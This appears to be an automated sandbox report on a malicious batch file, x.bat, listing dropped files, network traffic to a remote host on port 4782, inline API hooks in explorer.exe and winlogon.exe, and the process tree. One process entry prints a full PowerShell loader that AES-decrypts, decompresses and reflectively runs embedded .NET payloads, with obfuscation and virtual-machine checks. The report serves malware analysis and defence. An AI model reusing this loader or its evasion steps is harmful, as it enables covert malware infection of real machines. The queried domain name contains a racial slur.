                                                        Preview:ElfChnk....................................................................................................................x...........................................8...=...........................................................................................................................f...............?...........................m...................M...F...............................................................................................................&...................................**..............i.T..............&............"3WI..L..........A..|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                        Process:C:\Windows\System32\svchost.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):65536
                                                        Entropy (8bit):1.231195890775603
                                                        Encrypted:false
                                                        SSDEEP:384:ZhOVPiVcVCVC7VNVtVEV3Vob7V5VXVmVbVoV/VEVptVtVBVnVOVt9VjViVyVKVui:Zyjbn
                                                        MD5:3365A34953FD7B16667108A049B64DA5
                                                        SHA1:C72421A58E063D64072152344B266F8306A78702
                                                        SHA-256:AAEDFFE84B66B602858AF51D5B2EBA7CFC9DB57A4A3DD3240DB44B737B9BBF26
                                                        SHA-512:A5569EDC7516DACCCE7B3135114588E01ED1A77CA95B0F378E389E27AC8999EA71E8AF36FD275EEA7E81987CB9BF14910645DE3DC4FE8E086FF532796DD78AAF
                                                        Malicious:false
                                                        Preview:ElfChnk.........!...............!............7..`8...j......................................................................@..#................&...........................=...........................................................................................................................f...............?...........................m...................M...F...........................&...............................v....................................................3..................................**..P...........y................&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                        Process:C:\Windows\System32\svchost.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):65536
                                                        Entropy (8bit):4.350637590276604
                                                        Encrypted:false
                                                        SSDEEP:384:Ih+BwB5BwBjBwBNSBwBYiBwB+BwBXBwBZabSqBwBlQBwBtfBwBvBwBPnBwBIrBww:IOqabeGTnbuSx8
                                                        MD5:354A2904520E9FD0C611B4EBDD7385AE
                                                        SHA1:DECBFBB01430B8612EFB17A35801707A52E15E28
                                                        SHA-256:21FDE075C0EB7A2BC2081AC1A89DA92C8C91C7080C19E246CA0B527C814A3AD5
                                                        SHA-512:4C0C0B831D03F23E6CE54154E30351C74BFD43EB82986425A4EAAC79401075F9F5057D305DCB46AA9C5C238CC24A8D88C493FBF4CE460F253941E3466EB25E62
                                                        Malicious:false
                                                        Preview:ElfChnk.....................................H...x...6A......................................................................0...............................................=...........................................................................................................................f...............?...........................m...................M...F....................S......................................&...................................u...................................................**...............Dbf..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                        Process:C:\Windows\System32\svchost.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):65536
                                                        Entropy (8bit):4.421206160086997
                                                        Encrypted:false
                                                        SSDEEP:384:ah1qUEzUELUEnUEQUEpUE9UE4UEvUEqUEGUEuUEyUEpjUEmUE6UEVUE1UEdUEoUF:arN5mPfkvmR
                                                        MD5:67CAD90771EBC0BD20736201D89C1586
                                                        SHA1:EE241B07EBD6E7A64AE367520F5C0665F4EBBAD7
                                                        SHA-256:7801ED56F87C5A71A42128D089176CFDAACCCD6998EACCD07E46207F2CD48467
                                                        SHA-512:27DE77A98E11A1D33B648B9F46671F61338B1746032B4AD8F003A8A5C52FB7C3ECCB834057074EF5FCD3459A0810439BAF63E1320B385F7A5E81757A90BBFD13
                                                        Malicious:false
                                                        Preview:ElfChnk.........l...............l...............@....^.....................................................................+t].................6.......................^...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&.......Q8.......................................................6......................**...............yM..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                        Process:C:\Windows\System32\svchost.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):68120
                                                        Entropy (8bit):4.32761041402411
                                                        Encrypted:false
                                                        SSDEEP:384:IuFREuFRromlonS6cWNfoLSbdsLSvnQYoxMtg6Wo9MtxLo9MtMozonuoxNo/Vo10:HNJJa1ZGg6ULyhf
                                                        MD5:B5049BF19208C345EE552F79F700BF9B
                                                        SHA1:F3B16565C3C1256E530D0042655D9302E0039E15
                                                        SHA-256:FF5A3C02053AA8E027797201ABB5A81D4179DB3B062B4A8ABF1BFB77FCD549B1
                                                        SHA-512:410F6C75DA9CEADF28199B029A0E7C888462FE4CFE63751CE887FE078D7A370CB20C859A9C0126B1EAC4EB28FA24C8E0819A6417505A4F1C850C54C1094E1301
                                                        Malicious:false
                                                        Preview:ElfChnk.................U.......U...................a\+...........................................................................................s...h...............N...=...................................................N...............................................w.......4.......................-...................................[...........).......M...R...:...........................................................&...................................................................................**......U.......d^..\M.........Wt.&........Wt...wX..9Ck?5.?.......A..3...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.....\...........oT..S.y.s.t.e.m....A...............{..P.r.o.v.i.d.e.r.......F=.......K...N.a.m.e.......M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.E.v.e.n.t.l.o.g..........)...G.u.i.d.....&.{.f.c.6.5.d.d.d.8.-.d.6.e.f.-.4.9.6.2.-.8.3.d.5.-.6.e.5.c.f.e.9.c.e.1.
                                                        Process:C:\Windows\System32\svchost.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):69616
                                                        Entropy (8bit):4.385074666859093
                                                        Encrypted:false
                                                        SSDEEP:384:3FRL8AFRL8Vsd9WhE1gHUnVlGY/eD+A4NuRfnDfaEfuQLRuLGLW7eJvGAgXZIpUf:1H8UeuXnLmLQXHmtpJnqiNHpzoQp
                                                        MD5:3FDE910CB6B762A59680A039657BF25C
                                                        SHA1:3FD65C18B0F41607CA79D88CE799CCDF5F0933B9
                                                        SHA-256:B905820651EE4DFE63CD83B9762508CCF3FE8A8CEA9CA8B9A41ED80CB7AB1BC7
                                                        SHA-512:D9EE405BC5248203BDAE4DFA60031D4F17E82FBCE9F6EC1F64469715829E826F5BD966EB9410CF9F4A6CB9DA4F46AB466E16182D9313BE2F4D389EF36FE795D1
                                                        Malicious:false
                                                        Preview:ElfChnk.................n.......s....................B8d.....................................................................Y.s....................s...h...............N...=...................................................N...............................................w.......0.......................E...................................W...........).......M...3...:...........................................................................................................................&...................**..0...n.......d^..\M.........i.e&........i.e.t.Q...H.C.A;.......A../...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.....X...........oT..S.y.s.t.e.m....A...............{..P.r.o.v.i.d.e.r.......F=.......K...N.a.m.e.......M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.E.v.e.n.t.l.o.g..........)...G.u.i.d.....&.{.f.c.6.5.d.d.d.8.-.d.6.e.f.-.4.9.6.2.-.8.3.d.5.-.6.e.5.c.f.e.9.c.e.1.
                                                        Process:C:\Windows\System32\svchost.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):15064
                                                        Entropy (8bit):3.8034400020267225
                                                        Encrypted:false
                                                        SSDEEP:192:b2jceB+ypybynyM/yIyHia0J+Qha/ngxuI:bQc5EY0X/nqpRo5
                                                        MD5:60191A6ED6F36F0660A1177AD47B455C
                                                        SHA1:E4E659C229F1400F710C26CECB31F131DC8FF7F3
                                                        SHA-256:BFF82F0CC57CB9EE3D2217E1DCCE2A02C65CFAF33E4D78B5BB163CD1EE54E40D
                                                        SHA-512:8194C6B8953C41F887F4550D0C5FC38B74163764C951293C64537A08E5DD47A75C9CD2BA627E31123E2C0890B63532E1FC3D32AA7242E15C4B8BADDAC3771B51
                                                        Malicious:false
                                                        Preview:ElfChnk.................y....................6...:...Do.......................................................................g.............................................=..........................................................................................................................._...............8...........................f...................M...c...........................n...............................................&.......................................................................**......y........z. \M.........B.&........B...._j..d.:Ad........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..R............{..P.r.o.v.i.d.e.r.../....=.......K...N.a.m.e.......P.o.w.e.r.S.h.e.l.l..A..M...s........a..E.v.e.n.t.I.D...'............)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n............
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with very long lines (2183), with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):2386
                                                        Entropy (8bit):5.705668288544162
                                                        Encrypted:false
                                                        SSDEEP:48:9JFHDRtmRosRBRxpB3RRKB3a3ul2tEoq69dsMiZ1d2gqnio2Un2Uu2Ui+:PFHDRtmOsz7pBBRKBkcP69G5qnio2s2h
                                                        MD5:A4FA26BDA70CF3BB2B2A7EEFA945B4EE
                                                        SHA1:14EF6BFEEE580A06975C38B7B9AE0D0BF48AF599
                                                        SHA-256:B2A5890D7AFA127A3B75F7F27A1A54B23C67CC3D36BDFA3C7ADA859C94868F9D
                                                        SHA-512:F396839A34FD7046283647C411AEB99BBE3F98D00D055B5B9FA7B65FC93B4939714F832AFB05F2BC536F7301060167F05FC6E0ACFD8B9A6053CE8B7D7140E5B3
                                                        Malicious:false
                                                        Preview:Windows PowerShell..Copyright (C) Microsoft Corporation. All rights reserved.....Try the new cross-platform PowerShell https://aka.ms/pscore6....PS C:\Users\user\Desktop> function aQLUy($yReKm){.$FiuGL=[System.Security.Cryptography.Aes]::Create();.$FiuGL.Mode=[System.Security.Cryptography.CipherMode]::CBC;.$FiuGL.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;.$FiuGL.Key=[System.Convert]::FromBase64String('Yeb/NAcCgrTp64tTdeVgDdugi9XnGFjFK2NDoLygP24=');.$FiuGL.IV=[System.Convert]::FromBase64String('lhLiL9MPOAHIRlkYn9z7VA==');.$exYAh=$FiuGL.CreateDecryptor();.$YgVOo=$exYAh.TransformFinalBlock($yReKm, 0, $yReKm.Length);.$exYAh.Dispose();.$FiuGL.Dispose();.$YgVOo;}function mFHoz($yReKm){.Invoke-Expression '$HdeTZ=New-Object *S*y*s*t*e*m*.*I*O*.M*em*or*yS*tr*ea*m(,$yReKm);'.Replace('*', '');.Invoke-Expression '$wKYjD=New-Object *S*y*s*t*e*m*.*I*O*.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', '');.Invoke-Expression '$odkuT=New-Object S*y*s*t*e*m*.*I*O*.C*om*pr*e*ss*io*n.*GZ*ip*St*re
                                                        File type:DOS batch file, ASCII text, with very long lines (3511), with CRLF line terminators
                                                        Entropy (8bit):6.017050343783169
                                                        TrID:
                                                        • BibTeX references (5501/1) 100.00%
                                                        File name:x.bat
                                                        File size:7'312'129 bytes
                                                        MD5:3839596a3f33711abce263e7d890b2e9
                                                        SHA1:185a35a99a20422843725342c374ebae76b76fdc
                                                        SHA256:ac0c9ad2975e52b69068d331e25c0f7e1aaa2976651794b1eeadf5a3529bcaf0
                                                        SHA512:d00d7bb5f7cdbea678b03a312df249f2f7550462a7e81151e7db960c8f05d61d91b4ba03f89bf107d8419540897b056408fd21a68b408f122aa9906a9a1f348a
                                                        SSDEEP:49152:wDYqqQ9PgglFCYjq3HsyU+CwUp7B+Li23ovqJ+dwvnP/SRqRIEIS1x3KMb/ASHc0:h
                                                        TLSH:867633613BD82EDF491EC62ED016BD2E23D74FA1989DA4C2C7D136830B5EB639A15C13
                                                        File Content Preview:@echo off..%RKvQjzEhGUtCzoCqSvuaYKSBifusrwnQWHuUlxqUJiLDfoFwJELgAXS%@%RUIeelQjHDGRTIeuf%%rQZpvTzYIMLgqYPncrPlPyrBWCIOCbzqbZGbh%e%yOFfDdyAmHcGFNFTLTyysTlLwGnufqsNfzSaGJUo%%wpaMVvMLhoND%c%kEDUJWQeuVpoBfUEmcYkvVDkYAlAJXcEkvpnwMZYxXbuKxu%%RgUmPsnobsViLpvxSKdf
                                                        Icon Hash:9686878b929a9886
                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Dec 13, 2024 13:40:32.716829062 CET497364782192.168.2.4103.230.121.81
                                                        Dec 13, 2024 13:40:32.837080002 CET478249736103.230.121.81192.168.2.4
                                                        Dec 13, 2024 13:40:32.837198973 CET497364782192.168.2.4103.230.121.81
                                                        Dec 13, 2024 13:40:32.866866112 CET497364782192.168.2.4103.230.121.81
                                                        Dec 13, 2024 13:40:32.986726046 CET478249736103.230.121.81192.168.2.4
                                                        Dec 13, 2024 13:40:35.511522055 CET478249736103.230.121.81192.168.2.4
                                                        Dec 13, 2024 13:40:35.511718988 CET497364782192.168.2.4103.230.121.81
                                                        Dec 13, 2024 13:40:35.518270969 CET497364782192.168.2.4103.230.121.81
                                                        Dec 13, 2024 13:40:35.638056993 CET478249736103.230.121.81192.168.2.4
                                                        Dec 13, 2024 13:41:21.493244886 CET498194782192.168.2.4103.230.121.81
                                                        Dec 13, 2024 13:41:22.507673979 CET498194782192.168.2.4103.230.121.81
                                                        Dec 13, 2024 13:41:24.523298979 CET498194782192.168.2.4103.230.121.81
                                                        Dec 13, 2024 13:41:28.523338079 CET498194782192.168.2.4103.230.121.81
                                                        Dec 13, 2024 13:41:36.523335934 CET498194782192.168.2.4103.230.121.81
                                                        Dec 13, 2024 13:41:45.901159048 CET498264782192.168.2.4103.230.121.81
                                                        Dec 13, 2024 13:41:46.913923979 CET498264782192.168.2.4103.230.121.81
                                                        Dec 13, 2024 13:41:48.929656029 CET498264782192.168.2.4103.230.121.81
                                                        Dec 13, 2024 13:41:52.945255995 CET498264782192.168.2.4103.230.121.81
                                                        Dec 13, 2024 13:42:00.945224047 CET498264782192.168.2.4103.230.121.81
                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Dec 13, 2024 13:40:32.384555101 CET6282353192.168.2.41.1.1.1
                                                        Dec 13, 2024 13:40:32.708169937 CET53628231.1.1.1192.168.2.4
                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                        Dec 13, 2024 13:40:32.384555101 CET192.168.2.41.1.1.10xc408Standard query (0)iam.nigga.dadA (IP address)IN (0x0001)false
                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                        Dec 13, 2024 13:40:32.708169937 CET1.1.1.1192.168.2.40xc408No error (0)iam.nigga.dad103.230.121.81A (IP address)IN (0x0001)false

                                                        Code Manipulations

                                                        Function NameHook TypeActive in Processes
                                                        ZwEnumerateKeyINLINEexplorer.exe, winlogon.exe
                                                        NtQuerySystemInformationINLINEexplorer.exe, winlogon.exe
                                                        ZwResumeThreadINLINEexplorer.exe, winlogon.exe
                                                        NtDeviceIoControlFileINLINEexplorer.exe, winlogon.exe
                                                        ZwDeviceIoControlFileINLINEexplorer.exe, winlogon.exe
                                                        NtEnumerateKeyINLINEexplorer.exe, winlogon.exe
                                                        NtQueryDirectoryFileINLINEexplorer.exe, winlogon.exe
                                                        ZwEnumerateValueKeyINLINEexplorer.exe, winlogon.exe
                                                        ZwQuerySystemInformationINLINEexplorer.exe, winlogon.exe
                                                        NtResumeThreadINLINEexplorer.exe, winlogon.exe
                                                        RtlGetNativeSystemInformationINLINEexplorer.exe, winlogon.exe
                                                        NtQueryDirectoryFileExINLINEexplorer.exe, winlogon.exe
                                                        NtEnumerateValueKeyINLINEexplorer.exe, winlogon.exe
                                                        ZwQueryDirectoryFileExINLINEexplorer.exe, winlogon.exe
                                                        ZwQueryDirectoryFileINLINEexplorer.exe, winlogon.exe
                                                        Function NameHook TypeNew Data
                                                        ZwEnumerateKeyINLINE0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                                                        NtQuerySystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                        ZwResumeThreadINLINE0xE9 0x9A 0xA3 0x32 0x27 0x7F
                                                        NtDeviceIoControlFileINLINE0xE9 0x90 0x03 0x33 0x34 0x4F
                                                        ZwDeviceIoControlFileINLINE0xE9 0x90 0x03 0x33 0x34 0x4F
                                                        NtEnumerateKeyINLINE0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                                                        NtQueryDirectoryFileINLINE0xE9 0x9A 0xA3 0x32 0x2B 0xBF
                                                        ZwEnumerateValueKeyINLINE0xE9 0x90 0x03 0x33 0x31 0x1F
                                                        ZwQuerySystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                        NtResumeThreadINLINE0xE9 0x9A 0xA3 0x32 0x27 0x7F
                                                        RtlGetNativeSystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                        NtQueryDirectoryFileExINLINE0xE9 0x97 0x73 0x30 0x0A 0xAF
                                                        NtEnumerateValueKeyINLINE0xE9 0x90 0x03 0x33 0x31 0x1F
                                                        ZwQueryDirectoryFileExINLINE0xE9 0x97 0x73 0x30 0x0A 0xAF
                                                        ZwQueryDirectoryFileINLINE0xE9 0x9A 0xA3 0x32 0x2B 0xBF
                                                        Function NameHook TypeNew Data
                                                        ZwEnumerateKeyINLINE0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                                                        NtQuerySystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                        ZwResumeThreadINLINE0xE9 0x9A 0xA3 0x32 0x27 0x7F
                                                        NtDeviceIoControlFileINLINE0xE9 0x90 0x03 0x33 0x34 0x4F
                                                        ZwDeviceIoControlFileINLINE0xE9 0x90 0x03 0x33 0x34 0x4F
                                                        NtEnumerateKeyINLINE0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                                                        NtQueryDirectoryFileINLINE0xE9 0x9A 0xA3 0x32 0x2B 0xBF
                                                        ZwEnumerateValueKeyINLINE0xE9 0x90 0x03 0x33 0x31 0x1F
                                                        ZwQuerySystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                        NtResumeThreadINLINE0xE9 0x9A 0xA3 0x32 0x27 0x7F
                                                        RtlGetNativeSystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                        NtQueryDirectoryFileExINLINE0xE9 0x97 0x73 0x30 0x0A 0xAF
                                                        NtEnumerateValueKeyINLINE0xE9 0x90 0x03 0x33 0x31 0x1F
                                                        ZwQueryDirectoryFileExINLINE0xE9 0x97 0x73 0x30 0x0A 0xAF
                                                        ZwQueryDirectoryFileINLINE0xE9 0x9A 0xA3 0x32 0x2B 0xBF

                                                        Click to jump to process

                                                        Click to jump to process

                                                        Click to dive into process behavior distribution

                                                        Click to jump to process

                                                        Target ID:0
                                                        Start time:07:39:58
                                                        Start date:13/12/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\x.bat" "
                                                        Imagebase:0x7ff6a4070000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:1
                                                        Start time:07:39:58
                                                        Start date:13/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff7699e0000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:2
                                                        Start time:07:39:58
                                                        Start date:13/12/2024
                                                        Path:C:\Windows\System32\wbem\WMIC.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:wmic diskdrive get Model
                                                        Imagebase:0x7ff640220000
                                                        File size:576'000 bytes
                                                        MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:3
                                                        Start time:07:39:58
                                                        Start date:13/12/2024
                                                        Path:C:\Windows\System32\findstr.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK"
                                                        Imagebase:0x7ff6903c0000
                                                        File size:36'352 bytes
                                                        MD5 hash:804A6AE28E88689E0CF1946A6CB3FEE5
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:moderate
                                                        Has exited:true

                                                        Target ID:4
                                                        Start time:07:39:59
                                                        Start date:13/12/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:cmd.exe /c echo function aQLUy($yReKm){ $FiuGL=[System.Security.Cryptography.Aes]::Create(); $FiuGL.Mode=[System.Security.Cryptography.CipherMode]::CBC; $FiuGL.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $FiuGL.Key=[System.Convert]::FromBase64String('Yeb/NAcCgrTp64tTdeVgDdugi9XnGFjFK2NDoLygP24='); $FiuGL.IV=[System.Convert]::FromBase64String('lhLiL9MPOAHIRlkYn9z7VA=='); $exYAh=$FiuGL.CreateDecryptor(); $YgVOo=$exYAh.TransformFinalBlock($yReKm, 0, $yReKm.Length); $exYAh.Dispose(); $FiuGL.Dispose(); $YgVOo;}function mFHoz($yReKm){ Invoke-Expression '$HdeTZ=New-Object *S*y*s*t*e*m*.*I*O*.M*em*or*yS*tr*ea*m(,$yReKm);'.Replace('*', ''); Invoke-Expression '$wKYjD=New-Object *S*y*s*t*e*m*.*I*O*.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); Invoke-Expression '$odkuT=New-Object S*y*s*t*e*m*.*I*O*.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($HdeTZ, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $odkuT.CopyTo($wKYjD); $odkuT.Dispose(); $HdeTZ.Dispose(); $wKYjD.Dispose(); $wKYjD.ToArray();}function tnqry($yReKm,$VDCUY){ Invoke-Expression '$KyIng=[*S*y*s*t*e*m*.*R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$yReKm);'.Replace('*', ''); Invoke-Expression '$TcvQt=$KyIng.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); Invoke-Expression '$TcvQt.*I*n*v*o*k*e*($null, $VDCUY);'.Replace('*', '');}$yFDGP = 'C:\Users\user\Desktop\x.bat';$host.UI.RawUI.WindowTitle = $yFDGP;$blPNL=[System.IO.File]::ReadAllText($yFDGP).Split([Environment]::NewLine);foreach ($nqZfK in $blPNL) { if ($nqZfK.StartsWith('tdfVh')) { $ZaBDo=$nqZfK.Substring(5); break; }}$ouiFf=[string[]]$ZaBDo.Split('\');Invoke-Expression '$pcr = mFHoz (aQLUy ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($ouiFf[0].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$aZk = mFHoz (aQLUy ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($ouiFf[1].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$fEm = mFHoz (aQLUy ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($ouiFf[2].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');tnqry $pcr $null;tnqry $aZk $null;tnqry $fEm (,[string[]] (''));
                                                        Imagebase:0x7ff6a4070000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:5
                                                        Start time:07:39:59
                                                        Start date:13/12/2024
                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:powershell.exe -WindowStyle Hidden
                                                        Imagebase:0x7ff788560000
                                                        File size:452'608 bytes
                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:7
                                                        Start time:07:40:00
                                                        Start date:13/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff7699e0000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:8
                                                        Start time:07:40:08
                                                        Start date:13/12/2024
                                                        Path:C:\Windows\System32\dllhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\System32\dllhost.exe /Processid:{6e38c76f-48eb-487e-9cfd-6176ccb652b5}
                                                        Imagebase:0x7ff70f330000
                                                        File size:21'312 bytes
                                                        MD5 hash:08EB78E5BE019DF044C26B14703BD1FA
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:moderate
                                                        Has exited:true

                                                        Target ID:9
                                                        Start time:07:40:08
                                                        Start date:13/12/2024
                                                        Path:C:\Windows\System32\winlogon.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:winlogon.exe
                                                        Imagebase:0x7ff7cd660000
                                                        File size:906'240 bytes
                                                        MD5 hash:F8B41A1B3E569E7E6F990567F21DCE97
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:moderate
                                                        Has exited:false

                                                        Target ID:10
                                                        Start time:07:40:08
                                                        Start date:13/12/2024
                                                        Path:C:\Windows\System32\lsass.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\lsass.exe
                                                        Imagebase:0x7ff7a2ae0000
                                                        File size:59'456 bytes
                                                        MD5 hash:A1CC00332BBF370654EE3DC8CDC8C95A
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:false

                                                        Target ID:11
                                                        Start time:07:40:09
                                                        Start date:13/12/2024
                                                        Path:C:\Windows\System32\svchost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
                                                        Imagebase:0x7ff6eef20000
                                                        File size:55'320 bytes
                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:false

                                                        Target ID:12
                                                        Start time:07:40:09
                                                        Start date:13/12/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Windows\System32\cmd.exe" /C type C:\Users\user\Desktop\x.bat>C:\Windows\$rbx-onimai2\$rbx-CO2.bat
                                                        Imagebase:0x7ff6a4070000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:13
                                                        Start time:07:40:09
                                                        Start date:13/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
